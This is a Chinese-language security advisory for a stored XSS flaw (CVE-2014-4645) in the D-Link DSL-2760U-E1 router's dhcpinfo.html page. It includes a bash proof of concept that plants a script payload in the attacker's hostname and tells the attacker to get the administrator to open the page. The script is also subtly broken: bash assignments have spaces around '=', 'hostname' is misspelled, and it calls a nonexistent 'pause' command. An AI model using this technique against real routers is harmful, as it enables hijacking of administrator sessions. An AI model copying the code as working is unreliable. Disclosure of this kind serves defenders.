D-link DSL-2760U-E1路由器\'dhcpinfo.html\' HTML注入漏洞

BugTraq-ID:68144

CVE-ID:CVE-2014-4645

 

受影响系统：

D-Link DSL-2760U-E1

详细信息：

 

D-link DSL-2760U-E1是款路由器产品。

 

 

 

D-link DSL-2760U-E1路由器在实现上存在HTML注入漏洞，攻击者可利用此漏洞在受影响设备内执行未授权操作。

 

 

来源：

Yuval tisf Nativ

测试方法：

警  告以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！#!/bin/bash

 

 

 

# Written and discovered by Yuval tisf Nativ

 

# The page \'dhcpinfo.html\' will list all machines connected to the network with hostname,

 

# IP, MAC and IP expiration. It is possible to store an XSS in this table by changing hostname.

 

 

 

# Checks if you are root

 

if [ "$(id -u)" != "0" ]; then

 

    echo "Please execute this script as root"

 

    exit 1

 

fi

 

 

 

# You\'re XSS here

 

xss = "\\"<script>alert(\'pwned\');</script>"

 

 

 

# backup current hostname

 

currhost = `hostname`

 

 

 

# Bannering

 

echo ""

 

echo "      D-Link Persistent XSS by tisf"

 

echo ""

 

echo "The page dhcpinfo.html is the vulnerable page."

 

echo "Ask the user to access it and your persistent XSS will be triggered."

 

echo ""

 

 

 

# Change hostname to XSS

 

sudo hosname $xss

 

 

 

# Restore previous hostname on exit

 

pause "Type any key to exit and restore your previous hostname."

 

sudo hostname $currhost

解决办法：

厂商补丁：

 

D-Link

------

目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

 

 

 

http://www.dlink.com/